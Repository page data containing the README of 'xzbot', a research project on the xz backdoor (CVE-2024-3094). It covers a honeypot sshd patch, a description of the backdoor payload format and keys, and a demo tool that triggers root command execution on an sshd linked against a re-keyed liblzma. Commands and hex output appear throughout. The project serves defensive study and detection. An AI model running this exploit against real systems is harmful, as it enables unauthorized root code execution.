[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-73238":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":16,"stars7d":16,"stars30d":17,"stars90d":16,"forks30d":16,"starsTrendScore":16,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":19,"hasPages":19,"topics":21,"createdAt":10,"pushedAt":10,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":16,"starSnapshotCount":16,"syncStatus":17,"lastSyncTime":25,"discoverSource":26},73238,"xzbot","amlweems\u002Fxzbot","amlweems","notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)","",null,"Go",3557,235,34,1,0,2,56.32,false,"main",[],"2026-06-12 04:01:08","# xzbot\n\nExploration of the xz [backdoor](https:\u002F\u002Fwww.openwall.com\u002Flists\u002Foss-security\u002F2024\u002F03\u002F29\u002F4) (CVE-2024-3094).\nIncludes the following:\n* [honeypot](#honeypot): fake vulnerable server to detect exploit attempts\n* [ed448 patch](#ed448-patch): patch liblzma.so to use our own ED448 public key\n* [backdoor format](#backdoor-format): format of the backdoor payload\n* [backdoor demo](#backdoor-demo): cli to trigger the RCE assuming knowledge of the ED448 private key\n\n![xzbot demo](assets\u002Fdemo.png)\n\n## honeypot\n\nSee [openssh.patch](openssh.patch) for a simple patch to openssh that logs any\nconnection attempt with a public key N matching the backdoor format.\n\n```\n$ git clone https:\u002F\u002Fgithub.com\u002Fopenssh\u002Fopenssh-portable\n$ patch -p1 \u003C ~\u002Fpath\u002Fto\u002Fopenssh.patch\n$ autoreconf\n$ .\u002Fconfigure\n$ make\n```\n\nAny connection attempt will appear as follows in sshd logs:\n```\n$ journalctl -u ssh-xzbot --since='1d ago' | grep xzbot:\nMar 30 00:00:00 honeypot 
sshd-xzbot[1234]: xzbot: magic 1 [preauth]\nMar 30 00:00:00 honeypot sshd-xzbot[1234]: xzbot: 010000000100000000000000000000005725B22ED2...\n```\n\n## ed448 patch\n\nThe backdoor uses a hardcoded ED448 public key for signature validation and\ndecrypting the payload. If we replace this key with our own, we can trigger\nthe backdoor.\n\nThe attacker's ED448 key is:\n```\n0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28\n34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48\n10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e\n20 d3 2c 60 2b 2c 6d 31 00\n```\n\nWe will replace this key with our own (generated with seed=0):\n```\n5b 3a fe 03 87 8a 49 b2 82 32 d4 f1 a4 42 ae bd\ne1 09 f8 07 ac ef 7d fd 9a 7f 65 b9 62 fe 52 d6\n54 73 12 ca ce cf f0 43 37 50 8f 9d 25 29 a8 f1\n66 91 69 b2 1c 32 c4 80 00\n```\n\nTo start, download a backdoored liblzma shared object, e.g.\nfrom https:\u002F\u002Fsnapshot.debian.org\u002Fpackage\u002Fxz-utils\u002F5.6.1-1.\nThen run the patch script. See [assets\u002F](assets\u002F) for examples.\n\n```\n$ pip install pwntools\n$ shasum -a 256 liblzma.so.5.6.1\n605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4  liblzma.so.5.6.1\n$ python3 patch.py liblzma.so.5.6.1\nPatching func at offset: 0x24470\nGenerated patched so: liblzma.so.5.6.1.patch\n```\n\nThen run sshd using this modified `liblzma.so.5.6.1.patch` shared object.\n\n## backdoor format\n\nThe backdoor can be triggered by connecting with an SSH certificate with a\npayload in the CA signing key N value. 
This payload must be encrypted and\nsigned with the attacker's ED448 key.\n\nThe structure has the following format:\n```\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n|   a (32 bit)  |   b (32 bit)  |           c (64 bit)          |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n|                                                               |\n+                     ciphertext (240 bytes)                    +\n|                                                               |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\nA request type is derived from the three values above (`a * b + c`).\nIf this value is greater than 3, the backdoor skips processing.\n\n* Type 1: unknown, expects zero bytes\n* Type 2: executes null-terminated payload with system()\n* Type 3: unknown, expects 48 bytes (signed)\n\nThe ciphertext is encrypted with chacha20 using the first 32 bytes of the\nED448 public key as a symmetric key. As a result, we can decrypt any\nexploit attempt using the following key:\n```\n0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28\n34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48\n```\n\nThe ciphertext has the following format:\n```\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n|                    signature (114 bytes)                      |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| x (1 bit) |            unused ? 
(14 bit)          | y (1 bit) |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n|        unknown (8 bit)        |         length (8 bit)        |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n|        unknown (8 bit)        |         command \\x00          |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\nSetting either `x` or `y` leads to slightly different code paths.\n\nThe signature is an RFC-8032 ED448 signature computed over the following values:\n* The 32-bit magic value (e.g. `02 00 00 00`)\n* The 5 bytes of fields before command\n* [optional] `length` bytes of the command\n* The first 32 bytes of the sha256 hash of the server's hostkey\n\n## backdoor demo\n\n```\n$ go install github.com\u002Famlweems\u002Fxzbot@latest\n```\n\n```\n$ xzbot -h\nUsage of xzbot:\n  -addr string\n        ssh server address (default \"127.0.0.1:2222\")\n  -seed string\n        ed448 seed, must match xz backdoor key (default \"0\")\n  -cmd string\n        command to run via system() (default \"id > \u002Ftmp\u002F.xz\")\n```\n\nThe following will connect to a vulnerable SSH server at `127.0.0.1:2222` and\nrun the command `id > \u002Ftmp\u002F.xz`:\n```\n$ xzbot -addr 127.0.0.1:2222 -cmd 'id > \u002Ftmp\u002F.xz'\n00000000  00 00 00 1c 73 73 68 2d  72 73 61 2d 63 65 72 74  |....ssh-rsa-cert|\n00000010  2d 76 30 31 40 6f 70 65  6e 73 73 68 2e 63 6f 6d  |-v01@openssh.com|\n00000020  00 00 00 00 00 00 00 03  01 00 01 00 00 01 01 01  |................|\n00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n...\n00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000160  00 00 01 14 00 00 00 07  73 73 68 2d 72 73 61 00  |........ssh-rsa.|\n00000170  00 00 01 01 00 00 01 00  02 00 00 00 01 00 00 00  |................|\n00000180  00 00 00 00 00 00 00 00  54 97 bc c5 ef 93 e4 24  |........T......$|\n00000190  cf b1 57 57 59 85 52 fd  41 2a a5 54 9e aa c6 52  
|..WWY.R.A*.T...R|\n000001a0  58 64 a4 17 45 8a af 76  ce d2 e3 0b 7c bb 1f 29  |Xd..E..v....|..)|\n000001b0  2b f0 38 45 3f 5e 00 f1  b0 00 15 84 e7 bc 10 1f  |+.8E?^..........|\n000001c0  0f 5f 50 36 07 9f bd 07  05 77 5c 74 84 69 c9 7a  |._P6.....w\\t.i.z|\n000001d0  28 6b e8 16 aa 99 34 bf  9d c4 c4 5c b8 fd 4a 3c  |(k....4....\\..J\u003C|\n000001e0  d8 2b 39 32 06 d9 4f a4  3a 00 d0 0b 0f a2 21 c0  |.+92..O.:.....!.|\n000001f0  86 c3 c9 e2 e6 17 b4 a6  54 ba c3 a1 4c 40 91 be  |........T...L@..|\n00000200  91 9a 2b f8 0b 18 61 1c  5e e1 e0 5b e8 00 00 00  |..+...a.^..[....|\n00000210  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n...\n00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000270  00 00 00 00 00 00 00 00  00 00 00 10 00 00 00 07  |................|\n00000280  73 73 68 2d 72 73 61 00  00 00 01 00              |ssh-rsa.....|\n2024\u002F03\u002F30 00:00:00 ssh: handshake failed: EOF\n```\n\nOn the vulnerable server, we can set a watchpoint for the call to `system()`\nand observe the command is executed:\n```\n$ bpftrace -e 'watchpoint:0x07FFFF74B1995:8:x {\n    printf(\"%s (%d): %s\\n\", comm, pid, str(uptr(reg(\"di\"))))\n}'\nAttaching 1 probe...\nsshd (1234): id > \u002Ftmp\u002F.xz\n\n$ cat \u002Ftmp\u002F.xz\nuid=0(root) gid=0(root) groups=0(root)\n```\n\nThe process tree after exploitation looks different from a normal sshd\nprocess tree:\n```\n# normal process tree\n$ ssh foo@bar\n$ ps -ef --forest\nroot         765       1  0 17:58 ?        00:00:00 sshd: \u002Fusr\u002Fsbin\u002Fsshd -D [listener] 0 of 10-100 startups\nroot        1026     765  7 18:51 ?        00:00:00  \\_ sshd: foo [priv]\nfoo         1050    1026  0 18:51 ?        00:00:00      \\_ sshd: foo@pts\u002F1\nfoo         1051    1050  0 18:51 pts\u002F1    00:00:00          \\_ -bash\n\n# backdoor process tree\n$ xzbot -cmd 'sleep 60'\n$ ps -ef --forest\nroot         765       1  0 17:58 ?        
00:00:00 sshd: \u002Fusr\u002Fsbin\u002Fsshd -D [listener] 0 of 10-100 startups\nroot         941     765  4 18:04 ?        00:00:00  \\_ sshd: root [priv]\nsshd         942     941  0 18:04 ?        00:00:00      \\_ sshd: root [net]\nroot         943     941  0 18:04 ?        00:00:00      \\_ sh -c sleep 60\nroot         944     943  0 18:04 ?        00:00:00          \\_ sleep 60\n```\n\n*Note: successful exploitation does not generate any INFO or higher log entries.*\n\n## References\n\n- https:\u002F\u002Fwww.openwall.com\u002Flists\u002Foss-security\u002F2024\u002F03\u002F29\u002F4\n- https:\u002F\u002Fgist.github.com\u002Fsmx-smx\u002Fa6112d54777845d389bd7126d6e9f504\n- https:\u002F\u002Fgist.github.com\u002Fq3k\u002Faf3d93b6a1f399de28fe194add452d01\n- https:\u002F\u002Fgist.github.com\u002Fkeeganryan\u002Fa6c22e1045e67c17e88a606dfdf95ae4\n","This project is an exploration of the xz backdoor (CVE-2024-3094). It provides a fake vulnerable server for detecting exploit attempts, a patch tool for replacing the ED448 public key, a description of the backdoor payload format, and a demo that triggers remote code execution. Its core functions are modifying the liblzma library to use a custom ED448 key and logging any connection attempt that matches the backdoor format. It is developed in Go and requires a few additional tools such as pwntools. It is suited to security researchers or red-team members simulating this specific exploitation scenario in a test environment in order to strengthen system security.","2026-06-11 03:44:38","high_star"]